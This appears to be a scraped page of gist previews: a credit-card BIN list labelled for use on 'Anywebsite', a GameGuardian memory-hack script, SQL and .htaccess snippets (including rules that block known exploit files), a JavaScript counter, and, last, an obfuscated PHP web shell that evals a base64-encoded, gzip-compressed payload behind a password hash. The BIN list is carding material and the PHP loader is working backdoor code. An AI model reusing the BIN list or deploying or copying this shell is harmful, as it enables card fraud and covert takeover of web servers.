This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
2020 BinList :fire::credit_card: | |
Anywebsite | |
441297 - Visa Platinum Debit/Credit | |
402074 - Walmart | |
441103 - Walmart | |
424631 - Walmart | |
551149 - Walmart | |
540168 - Walmart | |
426685 - Walmart |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
gg.clearResults() | |
gg.setRanges(gg.REGION_CODE_APP) | |
gg.searchNumber("-285787648;-290174237;-286131696;-286131696", gg.TYPE_DWORD, false, gg.SIGN_EQUAL, 0, -1) | |
gg.refineNumber("-290174237", gg.TYPE_DWORD, false, gg.SIGN_EQUAL, 0, -1) | |
n = gg.getResultCount() | |
HR = gg.getResults(n) | |
for i = 1, n do | |
gg.addListItems({ | |
[1] = { | |
address = HR[i].address +0, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- START DATABASE phpMyAdmin | |
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; | |
SET AUTOCOMMIT = 0; | |
START TRANSACTION; | |
SET time_zone = "+00:00"; | |
CREATE DATABASE IF NOT EXISTS `db_upload_blob` DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci; | |
USE `db_upload_blob`; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Menutupi versi web server dan index | |
ServerSignature Off | |
Options -Indexes | |
# Enable rewrite engine | |
RewriteEngine On | |
# Blokir metode permintaan yang mencurigakan | |
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC] | |
RewriteRule ^(.*)$ - [F,L] | |
# Blok WP timthumb hack | |
RewriteCond %{REQUEST_URI} (timthumb.php|phpthumb.php|thumb.php|thumbs.php) [NC] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<IfModule mod_rewrite.c> | |
<IfModule mod_negotiation.c> | |
Options +FollowSymLinks | |
Options -MultiViews | |
Options All -Indexes | |
</IfModule> | |
<IfModule mod_expires.c> | |
ExpiresActive On |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
let count = document.querySelector('#counter'); | |
let countVal = document.querySelector('.counter-value'); | |
if (count.length !== null) { | |
function addCommas(nStr) { | |
nStr += ''; | |
x = nStr.split('.'); | |
x1 = x[0]; | |
x2 = x.length > 1 ? '.' + x[1] : ''; | |
let rgx = /(\d+)(\d{3})/; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php error_reporting(E_ALL ^(E_NOTICE | E_WARNING));$GLOBALS['pass']="dce452e13814920210ad079f5e268522c2c35b98";$func="cr"."eat"."e_fun"."cti"."on";$s4ib0t=$func('$x','ev'.'al'.'("?>".gz'.'in'.'fla'.'te(ba'.'se'.'64'.'_de'.'co'.'de($x)));');$s4ib0t("7P15n9u2siiK/p9PofTxW929ZZuUKIlkHHstSiI1zxQ1JLn+cSYlTuIoKsn97A8gKYkaut1Osvc7756bvZdbBAqFAlAoVAGFws//djSn8K7VH9Wp/uyXR9OWAkP+6ttfDZuXHn8rfC7wrsvHTw/y3jFsV3Yf3hcefNk1dYs34G85TP+KthXKrg9/SrzPC7wnw9+6pdjwr8nrCZgl+5HtbuFPx7VF2fNk7+H507+//Awp+eFMiSt7duACgMfffnn0KrqA+gk5Dxq3XLvuoEJbNXVDTbUGEdt9UltOSLUplfdatxpHBMJukJGs4P54Nmth3Wiz5pZxSTHWqCUi/TDYIj1KM9vEhnQG2nxO8ESt0thbE2xRVfpMZPaqir6sdDlyb8WkTbSwcpHdO9rOIxvKRpvtmpqse5y92RptoT0U+81hCW93+dbWabZbmsQ0na1hLSWEH0Z8a6ByC9Ve2m3OLIe7rb/AxrS5bSJrvFH3Zz0m4lbL0ZIoRZKGmKuhqZFBXO4srOGm36uXRGpl0r2isJkswn2vaLtUkbD1JdmoIwoqmSV+O1S4Fm25vRY/QCy+KnRXTNgtzVSJYjhKKbrTVjgnSdLcruwu0y/VnNncqJtxcdGdc4HDsi1/Xlv2yLYxmrVbFSaMGNCkVmPUCxoaYw4b3Z2s0S2sh9JNIWiafqWI1g5TbDqVOXxYbctC3dBdRD6saZmT0aFZbZX2rc0YwbryTkYC0na56mG4C7alPTYWW/0+W+tuN+NgIxGGOxsNreZou |
NewerOlder